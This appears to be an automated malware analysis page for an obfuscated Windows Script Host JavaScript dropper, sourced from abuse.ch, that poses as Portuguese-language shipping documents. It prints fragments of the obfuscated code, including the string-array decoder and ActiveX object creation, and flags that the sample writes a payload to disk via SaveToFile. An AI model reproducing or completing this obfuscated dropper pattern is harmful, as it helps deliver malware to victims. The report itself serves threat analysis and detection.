Open-source atomic malware analysis

Analyze another

243702bc07e2c666ad7fef0457748b7b1bcad27dc9733fd24f44456382e50a67

JAVASCRIPT
Verdict: HOSTILE
AI Obfuscated WSH dropper writing payload
Mal-ecule
O₃(CAs₂Xe)H₃(DbF₂Po)Md
Size 2.9 MB download
First seen 11 hours ago
Analyzed 5 hours ago
Ecosystem javascript
Source abuse.ch
Also detected by 1 source
Obfuscated WSH ActiveX script writes a payload through SaveToFile: Documentos de embarque – BL e PL.JS:0x25b4
Dynamic property access on WScript object: Documentos de embarque – BL e PL.JS:0x2b3432
Documentos de embarque – BL e PL.JS javascript
6:3138 ၈ൟ⵸बࣻ෿ᤤ';
7
8 }var IHXYOUFSGEJVWBKGHH = _0x3da9;
9 (function (_0x5d6aa2, _0x100afa) {
10 var _0x2cdac1 = _0x3da9, _0xa83474 = _0x5d6aa2(); Obfuscated WSH ActiveX script writes a payload through SaveToFile
11 while (!![]) {
12 try {
13 var _0x53ddd1 = -parseInt(_0x2cdac1(0xde)) / 0x1 *
14:37 afa)
15 break;
16 else
17 _0xa83474['push'](_0xa83474['shift']()); Obfuscated WSH ActiveX script writes a payload through SaveToFile
18 } catch (_0x31f00e) {
19 _0xa83474['push'](_0xa83474['shift']());
20 }
21 }
22 }(_0x4f09, 0xa7605), f
22:27 ion (_0x283e8d, _0x5c7cba) {
23 var _0x3420fd = _0x3da9;
24 function _0x5cee9e(_0x2b2fa3, _0x34efc1, _0x3c1778) { Obfuscated WSH ActiveX script writes a payload through SaveToFile
25 return _0x5ad4(_0x34efc1 - 0x52, _0x2b2fa3);
26 }
27 function _0x5e3ef1(_0x29ac3
213:3059 �बࣻ෿ᤤIHXYOUFSGEJVWBKGଃⰧ�ᅭቔᒱಁ࡞ᬏ⊥শ໠ťᙼົᦻᴦ၈ൟ⵸बࣻ෿ᤤ';
214
215 }
216 var MNHHCRXTUIOP = new ActiveXObject(MNHHTUIOP); Obfuscated WSH ActiveX script writes a payload through SaveToFile
217 function IHXYOUFSGEJVWBKGCX(_0x2f099b) {
218 var _0x34548e = IHXYOUFSGEJVWBKGHH;
219 function _0xadc2d1(_0x1cea76, _0x3b99b0, _0x14bd7e) {
220 var _0x45b3dc = _0x3da9;
221 return _0x45b3dc(0x105) !== _0x45b3dc(0x105) ? _0x34a089(_0x3f3d31 - '0x1a3', _0xb3eb1) : _0x5ad4(_0x1cea76 - -_0x45b3dc(0xf2)
301:3 return (function () {
302 _0x3f043e(this, function () {
303 var _0x2d10a6 = _0x3da9, _0x1520b6 = new RegExp(_0x2d10a6(0x254)), _0x3d75ad = new RegExp('\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)', 'i') Obfuscated WSH ActiveX script writes a payload through SaveToFile

Loading traits…

Identity

SHA-256 243702bc07e2c666ad7fef0457748b7b1bcad27dc9733fd24f44456382e50a67
Canonical SHA-256 012e43fd2b14d579ea628983788b866f55a787502d247216a43714fc972c2393
Filename Documentos de embarque – BL e PL.JS
Package 243702bc07e2c666ad7fef0457748b7b1bcad27dc9733fd24f44456382e50a67

Origin

Source harvest
Feed malwarebazaar
Ecosystem javascript
Domain abuse.ch

Timeline

First seen 5 Aug 2026 17:31 UTC
First analyzed 5 Aug 2026 23:45 UTC
Last analyzed 5 Aug 2026 23:45 UTC
Last updated 5 Aug 2026 23:45 UTC

Labeling

Label bad
Label source harvest
Traits version b5ca8